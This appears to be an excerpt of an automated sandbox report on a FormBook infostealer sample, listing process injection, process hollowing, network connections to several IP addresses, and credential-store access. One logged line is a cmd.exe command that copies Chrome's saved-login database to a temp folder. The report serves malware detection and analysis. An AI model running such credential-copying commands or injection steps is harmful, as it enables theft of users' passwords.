Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0308AAB0 mov eax, dword ptr fs:[00000030h]	6_2_0308AAB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0308AAB0 mov eax, dword ptr fs:[00000030h]	6_2_0308AAB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030AFAB0 mov eax, dword ptr fs:[00000030h]	6_2_030AFAB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A2ACB mov eax, dword ptr fs:[00000030h]	6_2_030A2ACB
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A2AE4 mov eax, dword ptr fs:[00000030h]	6_2_030A2AE4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134AEF mov eax, dword ptr fs:[00000030h]	6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134AEF mov eax, dword ptr fs:[00000030h]	6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134AEF mov eax, dword ptr fs:[00000030h]	6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134AEF mov eax, dword ptr fs:[00000030h]	6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134AEF mov eax, dword ptr fs:[00000030h]	6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134AEF mov eax, dword ptr fs:[00000030h]	6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134AEF mov eax, dword ptr fs:[00000030h]	6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134AEF mov eax, dword ptr fs:[00000030h]	6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134AEF mov eax, dword ptr fs:[00000030h]	6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134AEF mov eax, dword ptr fs:[00000030h]	6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134AEF mov eax, dword ptr fs:[00000030h]	6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134AEF mov eax, dword ptr fs:[00000030h]	6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134AEF mov eax, dword ptr fs:[00000030h]	6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134AEF mov eax, dword ptr fs:[00000030h]	6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03079100 mov eax, dword ptr fs:[00000030h]	6_2_03079100
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03079100 mov eax, dword ptr fs:[00000030h]	6_2_03079100
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03079100 mov eax, dword ptr fs:[00000030h]	6_2_03079100
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03094120 mov eax, dword ptr fs:[00000030h]	6_2_03094120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03094120 mov eax, dword ptr fs:[00000030h]	6_2_03094120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03094120 mov eax, dword ptr fs:[00000030h]	6_2_03094120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03094120 mov eax, dword ptr fs:[00000030h]	6_2_03094120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03094120 mov ecx, dword ptr fs:[00000030h]	6_2_03094120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A513A mov eax, dword ptr fs:[00000030h]	6_2_030A513A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A513A mov eax, dword ptr fs:[00000030h]	6_2_030A513A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0309B944 mov eax, dword ptr fs:[00000030h]	6_2_0309B944
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0309B944 mov eax, dword ptr fs:[00000030h]	6_2_0309B944
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0307C962 mov eax, dword ptr fs:[00000030h]	6_2_0307C962
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0307B171 mov eax, dword ptr fs:[00000030h]	6_2_0307B171
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0307B171 mov eax, dword ptr fs:[00000030h]	6_2_0307B171
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0309C182 mov eax, dword ptr fs:[00000030h]	6_2_0309C182
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030AA185 mov eax, dword ptr fs:[00000030h]	6_2_030AA185
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A2990 mov eax, dword ptr fs:[00000030h]	6_2_030A2990
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030F69A6 mov eax, dword ptr fs:[00000030h]	6_2_030F69A6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A61A0 mov eax, dword ptr fs:[00000030h]	6_2_030A61A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A61A0 mov eax, dword ptr fs:[00000030h]	6_2_030A61A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030F51BE mov eax, dword ptr fs:[00000030h]	6_2_030F51BE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030F51BE mov eax, dword ptr fs:[00000030h]	6_2_030F51BE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030F51BE mov eax, dword ptr fs:[00000030h]	6_2_030F51BE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030F51BE mov eax, dword ptr fs:[00000030h]	6_2_030F51BE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030999BF mov ecx, dword ptr fs:[00000030h]	6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030999BF mov ecx, dword ptr fs:[00000030h]	6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030999BF mov eax, dword ptr fs:[00000030h]	6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030999BF mov ecx, dword ptr fs:[00000030h]	6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030999BF mov ecx, dword ptr fs:[00000030h]	6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030999BF mov eax, dword ptr fs:[00000030h]	6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030999BF mov ecx, dword ptr fs:[00000030h]	6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030999BF mov ecx, dword ptr fs:[00000030h]	6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030999BF mov eax, dword ptr fs:[00000030h]	6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030999BF mov ecx, dword ptr fs:[00000030h]	6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030999BF mov ecx, dword ptr fs:[00000030h]	6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030999BF mov eax, dword ptr fs:[00000030h]	6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_031349A4 mov eax, dword ptr fs:[00000030h]	6_2_031349A4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_031349A4 mov eax, dword ptr fs:[00000030h]	6_2_031349A4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_031349A4 mov eax, dword ptr fs:[00000030h]	6_2_031349A4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_031349A4 mov eax, dword ptr fs:[00000030h]	6_2_031349A4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0307B1E1 mov eax, dword ptr fs:[00000030h]	6_2_0307B1E1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0307B1E1 mov eax, dword ptr fs:[00000030h]	6_2_0307B1E1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0307B1E1 mov eax, dword ptr fs:[00000030h]	6_2_0307B1E1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_031041E8 mov eax, dword ptr fs:[00000030h]	6_2_031041E8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03144015 mov eax, dword ptr fs:[00000030h]	6_2_03144015
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03144015 mov eax, dword ptr fs:[00000030h]	6_2_03144015
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030F7016 mov eax, dword ptr fs:[00000030h]	6_2_030F7016
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030F7016 mov eax, dword ptr fs:[00000030h]	6_2_030F7016
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030F7016 mov eax, dword ptr fs:[00000030h]	6_2_030F7016
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0308B02A mov eax, dword ptr fs:[00000030h]	6_2_0308B02A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0308B02A mov eax, dword ptr fs:[00000030h]	6_2_0308B02A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0308B02A mov eax, dword ptr fs:[00000030h]	6_2_0308B02A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0308B02A mov eax, dword ptr fs:[00000030h]	6_2_0308B02A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A002D mov eax, dword ptr fs:[00000030h]	6_2_030A002D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A002D mov eax, dword ptr fs:[00000030h]	6_2_030A002D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A002D mov eax, dword ptr fs:[00000030h]	6_2_030A002D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A002D mov eax, dword ptr fs:[00000030h]	6_2_030A002D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A002D mov eax, dword ptr fs:[00000030h]	6_2_030A002D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0309A830 mov eax, dword ptr fs:[00000030h]	6_2_0309A830
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0309A830 mov eax, dword ptr fs:[00000030h]	6_2_0309A830
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0309A830 mov eax, dword ptr fs:[00000030h]	6_2_0309A830
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0309A830 mov eax, dword ptr fs:[00000030h]	6_2_0309A830
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03090050 mov eax, dword ptr fs:[00000030h]	6_2_03090050
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03090050 mov eax, dword ptr fs:[00000030h]	6_2_03090050
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03132073 mov eax, dword ptr fs:[00000030h]	6_2_03132073
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03141074 mov eax, dword ptr fs:[00000030h]	6_2_03141074
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03079080 mov eax, dword ptr fs:[00000030h]	6_2_03079080
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030F3884 mov eax, dword ptr fs:[00000030h]	6_2_030F3884
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030F3884 mov eax, dword ptr fs:[00000030h]	6_2_030F3884
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B90AF mov eax, dword ptr fs:[00000030h]	6_2_030B90AF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A20A0 mov eax, dword ptr fs:[00000030h]	6_2_030A20A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A20A0 mov eax, dword ptr fs:[00000030h]	6_2_030A20A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A20A0 mov eax, dword ptr fs:[00000030h]	6_2_030A20A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A20A0 mov eax, dword ptr fs:[00000030h]	6_2_030A20A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A20A0 mov eax, dword ptr fs:[00000030h]	6_2_030A20A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A20A0 mov eax, dword ptr fs:[00000030h]	6_2_030A20A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030AF0BF mov ecx, dword ptr fs:[00000030h]	6_2_030AF0BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030AF0BF mov eax, dword ptr fs:[00000030h]	6_2_030AF0BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030AF0BF mov eax, dword ptr fs:[00000030h]	6_2_030AF0BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0310B8D0 mov eax, dword ptr fs:[00000030h]	6_2_0310B8D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0310B8D0 mov ecx, dword ptr fs:[00000030h]	6_2_0310B8D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0310B8D0 mov eax, dword ptr fs:[00000030h]	6_2_0310B8D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0310B8D0 mov eax, dword ptr fs:[00000030h]	6_2_0310B8D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0310B8D0 mov eax, dword ptr fs:[00000030h]	6_2_0310B8D0

Enables debug privileges

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process token adjusted: Debug	Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 162.0.238.42 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 157.245.239.6 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 208.91.197.27 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 66.235.200.146 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.24.104.178 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 52.60.87.163 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.210 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.31.71.137 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.215 80	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\AT113020.exe	Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000 protect: page execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\AT113020.exe	Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000 value starts with: 4D5A	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Thread register set: target process: 3472	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Thread register set: target process: 3472	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Thread register set: target process: 3472	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 180000			Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: 9C0000			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\AT113020.exe	Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\AT113020.exe	Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2CC2008	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 6A4008	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2A01008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\AT113020.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe	Jump to behavior

Source: explorer.exe, 00000003.00000002.1017233955.0000000001640000.00000002.00000001.sdmp, msdt.exe, 00000008.00000002.1018849966.0000000002CD0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.1017233955.0000000001640000.00000002.00000001.sdmp, msdt.exe, 00000008.00000002.1018849966.0000000002CD0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000002.1017233955.0000000001640000.00000002.00000001.sdmp, msdt.exe, 00000008.00000002.1018849966.0000000002CD0000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000003.00000002.1016058264.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000003.00000002.1017233955.0000000001640000.00000002.00000001.sdmp, msdt.exe, 00000008.00000002.1018849966.0000000002CD0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000003.00000002.1017233955.0000000001640000.00000002.00000001.sdmp, msdt.exe, 00000008.00000002.1018849966.0000000002CD0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\AT113020.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	1_2_00405F80
Source: C:\Users\user\Desktop\AT113020.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	1_2_0040608C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	5_2_00405F80
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	5_2_0040608C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: GetLocaleInfoA,	5_2_0040BEEC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: GetLocaleInfoA,	5_2_0040BEA0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	5_2_040E5BA4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: GetLocaleInfoA,	5_2_040EA4A0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: GetLocaleInfoA,	5_2_040EA4EC

Source: C:\Users\user\Desktop\AT113020.exe

Code function: 1_2_0040A8E8 GetLocalTime,

1_2_0040A8E8

Source: C:\Users\user\Desktop\AT113020.exe

Code function: 1_2_0048D5D0 GetVersion,

1_2_0048D5D0

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 00000008.00000002.1019192293.00000000041E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.291702047.0000000004D34000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.291786561.0000000004DC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1015357654.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.290339336.00000000033D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.290677967.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.242236710.0000000002A55000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.242326324.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.276173804.0000000002A64000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.292339474.0000000002610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.289704123.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.284307510.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.283670455.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.284896549.0000000002F30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1016394094.0000000000690000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.285937486.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.242189185.0000000002A2C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.276221238.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.AT113020.exe.2ad0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Accfdrv.exe.2af0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.AT113020.exe.2ad0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Accfdrv.exe.2af0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Accfdrv.exe.4dc0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Accfdrv.exe.4dc0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msdt.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file access)

Source: C:\Windows\SysWOW64\msdt.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality:

Yara detected FormBook

